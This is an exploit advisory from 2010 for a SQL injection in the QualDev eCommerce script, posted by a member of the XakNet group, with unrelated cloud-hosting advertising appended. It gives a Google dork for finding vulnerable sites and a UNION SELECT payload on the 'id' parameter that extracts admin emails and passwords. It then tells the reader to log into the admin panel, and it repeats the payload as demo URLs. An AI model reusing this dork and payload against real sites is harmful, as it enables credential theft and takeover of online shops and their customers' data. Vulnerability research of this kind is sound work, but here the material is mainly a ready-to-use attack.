========================================================== ================
QualDev eCommerce script SQL injection vulnerability
========================================================== ================
# Exploit Title: QualDev eCommerce script SQL injection vulnerability
# Vendor: http://www.qualdev.com
# Date: 15.12.2010
# Version: all version
# Category: webapps
# Google dork: inurl: "index. php? File = allfile"
# Tested on: FreeBSD 7.1
# Author: ErrNick
# Site: XakNet.ru, forum.xaknet.ru
# Contact: errnick [at] xaknet [dot] ru
# Greatz 2 all memberz of XakNet team (X1mk0 ~, Saint, baltazar, Shyler,
Kronus, mst & others)
# Intro:
-A parameter is not properly sanitised before being used in a SQL query.
-Input passed to "id" parameter is not properly
-Sanitised before being used in a SQL query. This can be
-Exploited to manipulate SQL queries by injecting
-Arbitrary SQL code.
# Exploit:
Index. php? File = allfile & id =-9999 + union + select + 1, 2, 3, concat_ws (0x3a, vemail, vpassword), 5, 6, 7 + from + admin
Logining with admin email & password there
Http: // victim/adminpanel/
# Demo:
-
Http://www.site.com/index.php? File = allfile & id =-40 + union + select + 1, 2, 3, concat_ws (0x3a, vemail, vpassword), 5, 6, 7 + from + admin
-
Http://www.site.com/index.php? File = allfile & id =-9999 + union + select + 1, 2, 3, concat_ws (0x3a, vemail, vpassword), 5, 6, 7 + from + admin
-
Http://www.site.com/index.php? File = allfile & id =-9999 + union + select + 1, 2, 3, concat_ws (0x3a, vemail, vpassword), 5, 6, 7 + from + admin
Vizit us at http://xaknet.ru
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
